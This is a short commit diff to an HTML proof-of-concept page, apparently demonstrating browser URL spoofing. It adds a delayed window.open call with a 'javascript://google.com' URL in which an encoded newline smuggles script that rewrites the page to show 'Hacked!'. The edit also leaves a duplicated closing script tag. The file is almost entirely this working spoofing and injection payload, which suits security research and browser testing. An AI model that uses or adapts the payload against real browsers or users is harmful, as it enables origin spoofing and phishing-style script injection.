Enhance script to include delayed JavaScript URL opening
Added a timeout function to open a JavaScript URL after a delay.

--- a/spoof-scheme.html
+++ b/spoof-scheme.html
@@ -2,5 +2,10 @@
 function a(){
 	window.open("abcd://google.com", "x");
 	//menggunakan scheme abcd://
+	setTimeout(function(){
+		window.open("javascript://google.com/search?q=google.com&source=/%0adocument.body.innerHTML='%3ch1%20style=color:red%3eHacked!'", "x");
+	}, 111);
+}
+</script> 
 </script> 
 <button onclick="javascript:a()">Go</button>	
